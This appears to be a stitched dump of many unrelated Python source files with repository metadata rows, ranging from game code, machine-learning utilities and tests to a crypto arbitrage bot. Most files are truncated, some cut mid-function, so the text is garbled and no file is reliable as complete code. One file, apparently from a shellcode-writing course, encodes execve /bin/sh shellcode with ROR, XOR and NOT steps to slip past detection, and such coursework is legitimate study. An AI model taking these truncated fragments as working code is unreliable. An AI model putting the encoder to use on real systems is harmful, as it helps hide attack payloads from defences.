DISTRIBUTED=True,
log_verbose=True,
rl_br_args=RLBRArgs(rlbr_bet_set=None,
n_hands_each_seat=200,
n_workers=1,
# Training
DISTRIBUTED=False,
n_iterations=100,
play_n_games_per_iter=50,
# The DDQN
batch_size=512,
),
lbr_args=LBRArgs(n_lbr_hands_per_seat=30000,
n_parallel_lbr_workers=10,
DISTRIBUTED=True,
),
),
eval_methods={'br': 1,
#'rlbr': 1,
'lbr': 1,
},
n_iterations=12)
ctrl.run()
pdb.set_trace()
| 54.766667 | 119 | 0.370663 |
c7964aa0abe4f31ae2f01cae5205b2c444d9f154 | 8,436 | py | Python | geocircles/backend/gamestate.py | tmick0/geocircles | 12845d006eeb0a4032679209a953c1cb072d06d7 | [
"MIT"
] | null | null | null | geocircles/backend/gamestate.py | tmick0/geocircles | 12845d006eeb0a4032679209a953c1cb072d06d7 | [
"MIT"
] | null | null | null | geocircles/backend/gamestate.py | tmick0/geocircles | 12845d006eeb0a4032679209a953c1cb072d06d7 | [
"MIT"
] | null | null | null | import sqlite3
from enum import Enum
import random
__all__ = ['state_mgr', 'game_state', 'next_state']
| 36.838428 | 159 | 0.580844 |
c79748fa89a41d17ad6e31fcee8a32474231a1c4 | 27 | py | Python | tests/unit/providers/callables/__init__.py | YelloFam/python-dependency-injector | 541131e33858ee1b8b5a7590d2bb9f929740ea1e | [
"BSD-3-Clause"
] | null | null | null | tests/unit/providers/callables/__init__.py | YelloFam/python-dependency-injector | 541131e33858ee1b8b5a7590d2bb9f929740ea1e | [
"BSD-3-Clause"
] | null | null | null | tests/unit/providers/callables/__init__.py | YelloFam/python-dependency-injector | 541131e33858ee1b8b5a7590d2bb9f929740ea1e | [
"BSD-3-Clause"
] | null | null | null | """Tests for callables."""
| 13.5 | 26 | 0.62963 |
c799f39a2d11cd8cf47042ccb70ce866c8193b11 | 191 | py | Python | dss/dss_capi_gr/__init__.py | dss-extensions/dss_python | f6c4440a14287d06f1bd10180484b349f764ba7e | [
"BSD-3-Clause"
] | 24 | 2019-03-07T20:24:24.000Z | 2022-03-23T17:58:00.000Z | dss/dss_capi_gr/__init__.py | dss-extensions/dss_python | f6c4440a14287d06f1bd10180484b349f764ba7e | [
"BSD-3-Clause"
] | 32 | 2019-02-14T03:46:31.000Z | 2022-03-23T00:01:28.000Z | dss/dss_capi_ir/__init__.py | PMeira/dss_python | 2dbc72ed875108d3f98d21cb0a488bab6b0d7f4c | [
"BSD-3-Clause"
] | 5 | 2019-02-19T04:54:49.000Z | 2022-03-23T10:40:51.000Z | '''
A compatibility layer for DSS C-API that mimics the official OpenDSS COM interface.
Copyright (c) 2016-2019 Paulo Meira
'''
from __future__ import absolute_import
from .IDSS import IDSS
| 23.875 | 83 | 0.78534 |
c79a2fb3f10def9e365b5ba6af795f7018c3bbe1 | 693 | py | Python | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
] | null | null | null | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
] | null | null | null | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
] | null | null | null | from .component import Component, using_scope
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
| 27.72 | 78 | 0.681097 |
c79bb693d6ca4d67f78e8585c83eae0b233a16e3 | 76 | py | Python | hydrocarbon_problem/env/__init__.py | lollcat/Aspen-RL | 0abefb9e7def7762e829ac4d621519d9d01592c0 | [
"MIT"
] | 1 | 2021-12-09T04:27:33.000Z | 2021-12-09T04:27:33.000Z | hydrocarbon_problem/env/__init__.py | lollcat/Aspen-RL | 0abefb9e7def7762e829ac4d621519d9d01592c0 | [
"MIT"
] | 2 | 2021-12-09T08:47:12.000Z | 2022-03-25T16:07:56.000Z | hydrocarbon_problem/env/__init__.py | lollcat/Aspen-RL | 0abefb9e7def7762e829ac4d621519d9d01592c0 | [
"MIT"
] | 1 | 2022-03-23T13:53:54.000Z | 2022-03-23T13:53:54.000Z | from hydrocarbon_problem.env.types_ import Observation, Done, Stream, Column | 76 | 76 | 0.855263 |
c79c07c8078e5f1d72628e2e7fc0c80e75f6489c | 12,955 | py | Python | addon_common/common/decorators.py | Unnoen/retopoflow | 73c7cfc10a0b58937198d60e308ba5248b446490 | [
"OML"
] | 1 | 2022-01-10T23:40:21.000Z | 2022-01-10T23:40:21.000Z | addon_common/common/decorators.py | Unnoen/retopoflow | 73c7cfc10a0b58937198d60e308ba5248b446490 | [
"OML"
] | null | null | null | addon_common/common/decorators.py | Unnoen/retopoflow | 73c7cfc10a0b58937198d60e308ba5248b446490 | [
"OML"
] | null | null | null | '''
Copyright (C) 2021 CG Cookie
http://cgcookie.com
hello@cgcookie.com
Created by Jonathan Denning, Jonathan Williamson
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os
import re
import json
import time
import inspect
from functools import wraps
import bpy
debug_run_test_calls = False
# corrected bug in previous version of blender_version fn wrapper
# https://github.com/CGCookie/retopoflow/commit/135746c7b4ee0052ad0c1842084b9ab983726b33#diff-d4260a97dcac93f76328dfaeb5c87688
def blender_version_wrapper(op, ver):
self = blender_version_wrapper
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = fns = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
update_fn = self.ops[op](ver)
return wrapit
def only_in_blender_version(*args, ignore_others=False, ignore_return=None):
self = only_in_blender_version
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = {}
self.ignores = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
self.re_blender_version = re.compile(r'^(?P<comparison><|<=|==|!=|>=|>) *(?P<version>\d\.\d\d)$')
matches = [self.re_blender_version.match(arg) for arg in args]
assert all(match is not None for match in matches), f'At least one arg did not match version comparison: {args}'
results = [self.ops[match.group('comparison')](match.group('version')) for match in matches]
version_matches = all(results)
return wrapit
def warn_once(warning):
return wrapper
class PersistentOptions:
class WrappedDict:
def __init__(self, cls, filename, version, defaults, update_external):
self._dirty = False
self._last_save = time.time()
self._write_delay = 2.0
self._defaults = defaults
self._update_external = update_external
self._defaults['persistent options version'] = version
self._dict = {}
if filename:
src = inspect.getsourcefile(cls)
path = os.path.split(os.path.abspath(src))[0]
self._fndb = os.path.join(path, filename)
else:
self._fndb = None
self.read()
if self._dict.get('persistent options version', None) != version:
self.reset()
self.update_external()
| 33.475452 | 143 | 0.542802 |
c79d02fd3237e472a6910ab89fe822c176242e9f | 11,414 | py | Python | venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 28,899 | 2016-10-13T03:32:12.000Z | 2022-03-31T21:39:05.000Z | venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 31,004 | 2016-10-12T23:22:27.000Z | 2022-03-31T23:17:38.000Z | venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 15,149 | 2016-10-13T03:21:31.000Z | 2022-03-31T18:46:47.000Z | import numpy as np
import pytest
from pandas import (
DataFrame,
Series,
concat,
)
import pandas._testing as tm
def create_mock_weights(obj, com, adjust, ignore_na):
if isinstance(obj, DataFrame):
if not len(obj.columns):
return DataFrame(index=obj.index, columns=obj.columns)
w = concat(
[
create_mock_series_weights(
obj.iloc[:, i], com=com, adjust=adjust, ignore_na=ignore_na
)
for i, _ in enumerate(obj.columns)
],
axis=1,
)
w.index = obj.index
w.columns = obj.columns
return w
else:
return create_mock_series_weights(obj, com, adjust, ignore_na)
def create_mock_series_weights(s, com, adjust, ignore_na):
w = Series(np.nan, index=s.index)
alpha = 1.0 / (1.0 + com)
if adjust:
count = 0
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
w.iat[i] = pow(1.0 / (1.0 - alpha), count)
count += 1
elif not ignore_na:
count += 1
else:
sum_wts = 0.0
prev_i = -1
count = 0
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
if prev_i == -1:
w.iat[i] = 1.0
else:
w.iat[i] = alpha * sum_wts / pow(1.0 - alpha, count - prev_i)
sum_wts += w.iat[i]
prev_i = count
count += 1
elif not ignore_na:
count += 1
return w
| 34.173653 | 88 | 0.615297 |
c79e030266cfddaf92e93230023130a13241d6c0 | 6,895 | py | Python | brainex/query.py | ebuntel/BrainExTemp | 991038155a6e9289af90da3d800210841ef23ff1 | [
"MIT"
] | 1 | 2020-09-04T16:15:26.000Z | 2020-09-04T16:15:26.000Z | brainex/query.py | ebuntel/Brainextemp | 991038155a6e9289af90da3d800210841ef23ff1 | [
"MIT"
] | null | null | null | brainex/query.py | ebuntel/Brainextemp | 991038155a6e9289af90da3d800210841ef23ff1 | [
"MIT"
] | null | null | null |
# TODO finish implementing query
import math
from pyspark import SparkContext
# from genex.cluster import sim_between_seq
from brainex.op.query_op import sim_between_seq
from brainex.parse import strip_function, remove_trailing_zeros
from .classes import Sequence
from brainex.database import genexengine
def query(q: Sequence, gc: genexengine, loi: list, sc: SparkContext,
k:int=1, ex_sameID: bool=False, overlap: float= 1.0, mode:str='genex'):
"""
:param q: query sequence
:param gc: Gcluster in which to query
:param loi: list of two integer values, specifying the query range, if set to None, is going to query all length
:param sc: spark context on which to run the query operation
:param k: integer, specifying to return top k matches
:param ex_sameID: boolean, whether to include sequences from the time series with the same id as the query sequence
:param overlap: float, how much overlapping between queries lookups
:param mode: query mode, supported modes are 'genex' and 'bf' (bf = brute force)
"""
if mode == 'genex':
gquery()
elif mode == 'bf':
bfquery()
else:
raise Exception('Unsupported query mode: ' + mode)
def gquery(query_list: list, gc_data: dict, loi: list, input_list: list,
k:int=1, ex_sameID: bool=False, overlap: float= 1.0, ):
"""
Because Gcluster object doesn't have map property, we have to use dict as input
:param file:
:param gc_data:
:param loi:
:param input_list:
:param k:
:param ex_sameID:
:param overlap:
:return:
"""
# get query from id, start, end point
# get query from csv file
#
# query_list = []
# query_set = get_query_from_csv_with_id(file)
# print(query_set)
# for cur_query in query_set:
# query_list.append(get_query_from_sequence(cur_query[0], int(cur_query[1]), int(cur_query[2]), input_list))
# print(query_list)
return custom_query(query_list, loi, gc_data, k, input_list)
#
# def custom_query_operation(q: Sequence, gc: Gcluster, loi: list, sc: SparkContext,
# k:int=1, ex_sameID: bool=False, overlap: float= 1.0):
#
# query_result = filter_rdd_back.repartition(16).map(
# lambda clusters: custom_query(q, loi, gc, k,
# global_time_series_dict.value, ))
# # changed here
# # plot_query_result(query_sequence, query_result, global_time_series_dict.value)
# return query_result
def get_query_from_sequence(id: tuple, start: int, end: int, input_list: list):
"""
:param id:
:param start:
:param end:
:param input_list:
:return: a list
"""
try:
input_dict = dict(input_list) # validate by converting input_list into a dict
except (TypeError, ValueError):
raise Exception('sequence: fetch_data: input_list is not key-value pair.')
return input_dict[id][start: end]
def custom_query(query_sequences: list, loi: list, Gcluster_data:dict, k : int, input_list:list):
# """
#
# :param query_sequences: list of list: the list of sequences to be queried
# :param cluster: dict[key = representative, value = list of timeSeriesObj] -> representative is timeSeriesObj
# the sequences in the cluster are all of the SAME length
# :param k: int
# :return list of time series objects: best k matches. Again note they are all of the SAME length
# """
"""
:param query_sequences:
:param query_range:
:param Gcluster_data:
:param k:
:param input_list:
:return:
"""
# get query from csv file which contains lists of list of query actual clusters
# get query from csv file which contains lists of tuple of id, start, endpoint
query_result = dict()
if not isinstance(query_sequences, list) or len(query_sequences) == 0:
raise ValueError("query sequence must be a list and not empty")
cur_query_number = 0
if isinstance(query_sequences[0], list):
print("length of query is [" + str(len(query_sequences)) + "]" + "[" + str(len(query_sequences[0])) + "]")
print("query is a list of list")
for cur_query in query_sequences:
if isinstance(cur_query, list):
query_result[cur_query_number] = get_most_k_sim(cur_query, loi, Gcluster_data, k, input_list)
cur_query_number += 1
return query_result
else:
return get_most_k_sim(query_sequences, loi, Gcluster_data, k, input_list)
def get_most_k_sim(query_sequence: list, loi: list, Gcluster_data : dict, k, input_list:list):
"""
:param query_sequence:
:param query_range:
:param Gcluster_data:
:param k:
:param input_list:
:return:
"""
min_rprs = None # the representative that is closest to the query distance
min_dist = math.inf
target_cluster = []
print("length of gcluster clusters is " + str(len(Gcluster_data[1])))
for cur_rprs_seq in Gcluster_data[1].keys():
# TODO do we want to get raw clusters here, or set the raw in timeSeriesObj before calling query (no parsing)
if (cur_rprs_seq.end - cur_rprs_seq.start + 1) in range(loi[0], loi[1] + 1):
# modify here, not use get clusters from objects, use values
cur_dist = sim_between_seq(query_sequence, cur_rprs_seq.fetch_data(input_list))
if cur_dist < min_dist:
min_rprs = cur_rprs_seq
min_dist = cur_dist
else:
break
if min_rprs:
print('min representative is ' + min_rprs.__str__())
print('min dist' + str(min_dist))
# print("Querying Cluster of length: " + str(len(get_data_for_timeSeriesObj(min_rprs, time_series_dict))))
target_cluster = Gcluster_data[1].get(min_rprs)
print('len of cluster is ' + str(len(target_cluster)))
# print("sorting")
#
target_cluster.sort(key=lambda cluster_sequence: sim_between_seq(query_sequence,
cluster_sequence.data))
k = int(k)
return target_cluster[0:k] # return the k most similar sequences
else:
return None
| 33.634146 | 119 | 0.639014 |
c79e23eb5e67f7342ba09df2a42c01c2772ded3a | 4,161 | py | Python | main.py | orgr/arbitrage_bot | 39365dce0dcae0f6bb4baf1d7c32392e28b6c623 | [
"MIT"
] | null | null | null | main.py | orgr/arbitrage_bot | 39365dce0dcae0f6bb4baf1d7c32392e28b6c623 | [
"MIT"
] | 1 | 2021-12-13T03:48:08.000Z | 2021-12-13T04:58:36.000Z | main.py | orgr/arbitrage_bot | 39365dce0dcae0f6bb4baf1d7c32392e28b6c623 | [
"MIT"
] | null | null | null | import sys
import time
from typing import List
import asyncio
import ccxt.async_support as ccxt
# import ccxt
import itertools
from enum import Enum
if __name__ == '__main__':
asyncio.run(main())
| 30.152174 | 111 | 0.564768 |
c79ee6a1b6ebeba170b33fbfe523726f9f206dbb | 1,497 | py | Python | examples/click-ninja/clickninja-final.py | predicatemike/predigame | 096e8379beb1d40ccb3f19ed2bb3ad82b405bb7f | [
"Apache-2.0"
] | null | null | null | examples/click-ninja/clickninja-final.py | predicatemike/predigame | 096e8379beb1d40ccb3f19ed2bb3ad82b405bb7f | [
"Apache-2.0"
] | null | null | null | examples/click-ninja/clickninja-final.py | predicatemike/predigame | 096e8379beb1d40ccb3f19ed2bb3ad82b405bb7f | [
"Apache-2.0"
] | null | null | null | WIDTH = 20
HEIGHT = 14
TITLE = 'Click Ninja'
BACKGROUND = 'board'
score(color = PURPLE)
callback(spawn, 1)
keydown('r', reset)
| 24.145161 | 86 | 0.549766 |
c79f981e96642b4e8be1f381e054bf741fdc029f | 7,166 | py | Python | nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 1530339d3e964a5ea95a0afde1775ec9167cdcc0 | [
"MIT"
] | 2,305 | 2018-09-07T12:42:26.000Z | 2019-05-06T20:14:24.000Z | nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 1530339d3e964a5ea95a0afde1775ec9167cdcc0 | [
"MIT"
] | 379 | 2018-09-10T10:19:50.000Z | 2019-05-06T18:04:46.000Z | nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 1530339d3e964a5ea95a0afde1775ec9167cdcc0 | [
"MIT"
] | 314 | 2018-09-08T05:36:08.000Z | 2019-05-06T08:48:51.000Z | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Callable, Dict
import torch
import torch.nn as nn
from nni.retiarii import model_wrapper
from nni.retiarii.nn.pytorch import NasBench201Cell
__all__ = ['NasBench201']
OPS_WITH_STRIDE = {
'none': lambda C_in, C_out, stride: Zero(C_in, C_out, stride),
'avg_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'avg'),
'max_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'max'),
'conv_3x3': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (3, 3), (stride, stride), (1, 1), (1, 1)),
'conv_1x1': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (1, 1), (stride, stride), (0, 0), (1, 1)),
'skip_connect': lambda C_in, C_out, stride: nn.Identity() if stride == 1 and C_in == C_out
else FactorizedReduce(C_in, C_out, stride),
}
PRIMITIVES = ['none', 'skip_connect', 'conv_1x1', 'conv_3x3', 'avg_pool_3x3']
| 34.786408 | 110 | 0.579542 |
c7a0f4dd6f424ce5b114a5129ff1abc4021aa810 | 1,195 | py | Python | setup.py | Pasha13666/dialog_py | c54a0e06dc0a5f86d9791b8cbd6fcfacb5b644ff | [
"MIT"
] | 1 | 2021-02-17T07:38:01.000Z | 2021-02-17T07:38:01.000Z | setup.py | Pasha13666/dialog_py | c54a0e06dc0a5f86d9791b8cbd6fcfacb5b644ff | [
"MIT"
] | null | null | null | setup.py | Pasha13666/dialog_py | c54a0e06dc0a5f86d9791b8cbd6fcfacb5b644ff | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='dialog_py',
version='1.0a1',
description='Python API for cdialog/linux dialog',
long_description=long_description,
url='https://github.com/pasha13666/dialog_py',
author='Pasha__kun',
author_email='pasha2001dpa@ya.ru',
packages=['dialog_py'],
install_requires=[],
include_package_data=True,
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython'
]
)
| 31.447368 | 88 | 0.620921 |
c7a18f6b2dc263a28bbb7cb8d8990ce3618a2615 | 8,334 | py | Python | test/test_who.py | rliebz/whoswho | 0c411e418c240fcec6ea0a23d15bd003056c65d0 | [
"MIT"
] | 28 | 2018-02-14T23:14:59.000Z | 2021-07-08T07:24:54.000Z | test/test_who.py | rliebz/whoswho | 0c411e418c240fcec6ea0a23d15bd003056c65d0 | [
"MIT"
] | 1 | 2019-01-21T15:25:49.000Z | 2019-01-23T19:03:06.000Z | test/test_who.py | rliebz/whoswho | 0c411e418c240fcec6ea0a23d15bd003056c65d0 | [
"MIT"
] | 2 | 2018-09-27T05:46:46.000Z | 2020-07-16T05:19:02.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import nose
from nose.tools import *
from whoswho import who, config
from nameparser.config.titles import TITLES as NAMEPARSER_TITLES
# TODO: Should we ensure that the metadata is up to date?
if __name__ == '__main__':
nose.main()
| 40.852941 | 83 | 0.636069 |
c7a1b4eccd5313fe3d7a77b6d5633a8332809125 | 2,012 | py | Python | endpoints/UserEndpoint.py | GardenersGalore/server | f7d7f8ae07b56fc3c4fbe46f0784329cd94ace2d | [
"MIT"
] | null | null | null | endpoints/UserEndpoint.py | GardenersGalore/server | f7d7f8ae07b56fc3c4fbe46f0784329cd94ace2d | [
"MIT"
] | 1 | 2021-06-02T00:35:43.000Z | 2021-06-02T00:35:43.000Z | endpoints/UserEndpoint.py | GardenersGalore/server | f7d7f8ae07b56fc3c4fbe46f0784329cd94ace2d | [
"MIT"
] | null | null | null | import json
from flask import request
from flask_restful import Resource, abort, reqparse
from models.User import User
"""
POST Creates a new resource.
GET Retrieves a resource.
PUT Updates an existing resource.
DELETE Deletes a resource.
"""
| 24.240964 | 97 | 0.548708 |
c7a2778b2130c187c84f5bc78fd439f687e7ad10 | 450 | py | Python | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
] | null | null | null | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
] | 19 | 2017-02-18T17:53:56.000Z | 2017-03-11T22:09:06.000Z | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
] | null | null | null | from django.forms import forms
| 23.684211 | 86 | 0.622222 |
c7a2d818488a83ba3e02cfaea886aa5551f314ae | 1,172 | py | Python | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
] | 15 | 2015-08-11T09:50:00.000Z | 2021-10-02T19:30:53.000Z | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
] | null | null | null | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
] | 9 | 2015-08-11T09:51:55.000Z | 2021-10-18T18:04:11.000Z | #!/usr/bin/python
# Title: ROR/XOR/NOT encoder
# File: rorxornotencode.py
# Author: Guillaume Kaddouch
# SLAE-681
import sys
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
shellcode = (
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
encoded = ""
encoded2 = ""
print "[*] Encoding shellcode..."
for x in bytearray(shellcode):
# ROR & XOR encoding
z = ror(x, 7, 8)^0xAA
# NOT encoding
y = ~z
if str('%02x' % (y & 0xff)).upper() == "00":
print ">>>>>>>>>> NULL detected in shellcode, aborting."
sys.exit()
if str('%02x' % (y & 0xff)).upper() == "0A":
print ">>>>>>>>>> \\xOA detected in shellcode."
if str('%02x' % (y & 0xff)).upper() == "0D":
print ">>>>>>>>>>> \\x0D detected in shellcode."
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' %(y & 0xff)
print "hex version : %s" % encoded
print "nasm version : %s" % encoded2
print "encoded shellcode : %s bytes" % str(len(encoded)/4)
| 23.44 | 102 | 0.562287 |
c7a32b4c1d013fec417f68425b02fe13d88c171e | 9,292 | py | Python | authalligator_client/entities.py | closeio/authalligator-client | fe93c9d2333d2949e44c48a2dd0a9a266734e026 | [
"MIT"
] | null | null | null | authalligator_client/entities.py | closeio/authalligator-client | fe93c9d2333d2949e44c48a2dd0a9a266734e026 | [
"MIT"
] | null | null | null | authalligator_client/entities.py | closeio/authalligator-client | fe93c9d2333d2949e44c48a2dd0a9a266734e026 | [
"MIT"
] | 1 | 2021-01-31T13:08:48.000Z | 2021-01-31T13:08:48.000Z | import datetime
from enum import Enum
from typing import Any, Callable, Dict, List, Optional, Type, TypeVar, Union, cast
import attr
import ciso8601
import structlog
from attr import converters
from . import enums
from .utils import as_json_dict, to_snake_case
logger = structlog.get_logger()
OMITTED = Omitted.token
"""A singleton to differentiate between omitted vs explicit :obj:`None`."""
# helper type for entity_converter
U = TypeVar("U", bound="BaseAAEntity")
def entity_converter(
entity_cls, # type: Union[List[Type[U]], Type[U]]
):
# type: (...) -> Callable[[Union[Omitted, U, Dict]], Union[U, Omitted]]
"""
Convert a dictionary response into instances of the entity class.
Usage:
# disambiguates between type_a and type_b based on ``__typename``
converter = entity_converter([TypeA, TypeB])
my_instance = converter({'__typename': 'TypeB'})
XXX: mypy isn't expressive enough to annotate that the return type will be
one of the _specific_ arg types and not the most generic bound base. We'll
unfortunately have to ``# type: ignore`` on lines that call this.
Args:
entity_cls: the class (or classes) the value should be converted into.
If multiple classes are provided as options, ``__typename`` must be
included in the reponse to support disambiguation.
Returns:
A callable that will convert a dictionary to the right entity type. If
more than one entity type is possible, that dictionary must have a
``__typename`` field present, which must match the ``TYPENAME`` on a
provided entity. If none of the provided types match of if the fields
don't align with the provided entity, a ``TypeError`` is raised.
"""
entity_classes = [] # type: List[Type[U]]
if isinstance(entity_cls, (list, tuple)):
entity_classes = entity_cls
else:
entity_classes = [entity_cls]
return _entity_converter
| 35.19697 | 88 | 0.660461 |
c7a3e79d5fcb0530f653c35813c95268647570c7 | 9,739 | py | Python | library/device.py | lompal/USBIPManager | b03d8d9c0befcd70b7f67cfe61c0664f48d2939d | [
"MIT"
] | 24 | 2019-01-25T20:40:07.000Z | 2020-11-20T08:12:14.000Z | library/device.py | lompal/USBIPManager | b03d8d9c0befcd70b7f67cfe61c0664f48d2939d | [
"MIT"
] | 3 | 2018-11-28T14:04:57.000Z | 2020-09-14T08:35:09.000Z | library/device.py | lompal/USBIPManager | b03d8d9c0befcd70b7f67cfe61c0664f48d2939d | [
"MIT"
] | 6 | 2019-08-23T05:30:26.000Z | 2020-11-20T08:12:03.000Z | from library import config, ini, lang, log, performance, periphery, queue
from asyncio import get_event_loop
from threading import Thread, Event
from PyQt5.QtCore import QObject, pyqtSignal
from PyQt5.QtWidgets import QTreeWidgetItem
# noinspection PyPep8Naming
# noinspection PyPep8Naming
# noinspection PyPep8Naming
def cancel(self):
""" Cancel the USBTOP processing - calling coroutine """
self._manager.exec(self._cancel, self._name_cancelling)
def isRunning(self):
""" Check if the USBTOP processing is running """
return self._thread.is_alive()
| 36.339552 | 118 | 0.618133 |
c7a3f3c709f3111aed4b0e26101a434835f55c66 | 3,959 | py | Python | agent/minimax/submission.py | youkeyao/SJTU-CS410-Snakes-3V3-Group06 | 180ab3714686cdd879454cf103affc6bb03b7fcd | [
"MIT"
] | 1 | 2022-01-09T13:59:34.000Z | 2022-01-09T13:59:34.000Z | agent/minimax/submission.py | youkeyao/SJTU-CS410-Snakes-3V3-Group06 | 180ab3714686cdd879454cf103affc6bb03b7fcd | [
"MIT"
] | null | null | null | agent/minimax/submission.py | youkeyao/SJTU-CS410-Snakes-3V3-Group06 | 180ab3714686cdd879454cf103affc6bb03b7fcd | [
"MIT"
] | null | null | null | DEPTH = 3
# Action
def my_controller(observation, action_space, is_act_continuous=False):
ac = Action.mapAct[MinimaxAgent(observation).get_action(observation['controlled_snake_index'])]
return [ac] | 32.186992 | 99 | 0.51023 |
c7a4ae3d4e412782ea4851134b89f174c5ee6fd3 | 224 | py | Python | public_html/python/Empty_Python_Page.py | Asher-Simcha/help | 23c52c136a885d76aa0e2e024cbf1587091f41a7 | [
"BSD-3-Clause"
] | null | null | null | public_html/python/Empty_Python_Page.py | Asher-Simcha/help | 23c52c136a885d76aa0e2e024cbf1587091f41a7 | [
"BSD-3-Clause"
] | null | null | null | public_html/python/Empty_Python_Page.py | Asher-Simcha/help | 23c52c136a885d76aa0e2e024cbf1587091f41a7 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/pyton
# Title:
# Author:
# Additional Authors:
# Filename:
# Description:
# Version:
# Date:
# Last Modified:
# Location_of_the_Video:
# Meta_data_for_YouTube:
# Web_Site_For_Video:
# Start Your Code Here
#EOF
| 12.444444 | 24 | 0.71875 |
c7a95d54d497e531abccb6e65c1f8ff7b1fbb2e5 | 7,202 | py | Python | semester3/oop/lab3/parser/client/MasterService/client.py | no1sebomb/University-Labs | 1da5e7486f0b8a6119c077945aba8c89cdfc2e50 | [
"WTFPL"
] | null | null | null | semester3/oop/lab3/parser/client/MasterService/client.py | no1sebomb/University-Labs | 1da5e7486f0b8a6119c077945aba8c89cdfc2e50 | [
"WTFPL"
] | null | null | null | semester3/oop/lab3/parser/client/MasterService/client.py | no1sebomb/University-Labs | 1da5e7486f0b8a6119c077945aba8c89cdfc2e50 | [
"WTFPL"
] | 1 | 2020-11-01T23:54:52.000Z | 2020-11-01T23:54:52.000Z | # coding=utf-8
from parser.client import *
from parser.client.ResponseItem import *
with (Path(__file__).resolve().parent / "config.json").open("rt") as siteConfigFile:
SITE_CONFIG = json.load(siteConfigFile)
| 43.648485 | 120 | 0.509303 |
c7a995a9727073409d096c9586ccf8c67b8e8dc3 | 7,320 | py | Python | sketchduino/template.py | rodrigopmatias/sketchduino | 567023d69cd21bf1f573d2a26fc855183abdef7e | [
"Apache-2.0"
] | null | null | null | sketchduino/template.py | rodrigopmatias/sketchduino | 567023d69cd21bf1f573d2a26fc855183abdef7e | [
"Apache-2.0"
] | 3 | 2015-01-09T20:31:22.000Z | 2015-01-09T20:31:22.000Z | sketchduino/template.py | rodrigopmatias/sketchduino | 567023d69cd21bf1f573d2a26fc855183abdef7e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
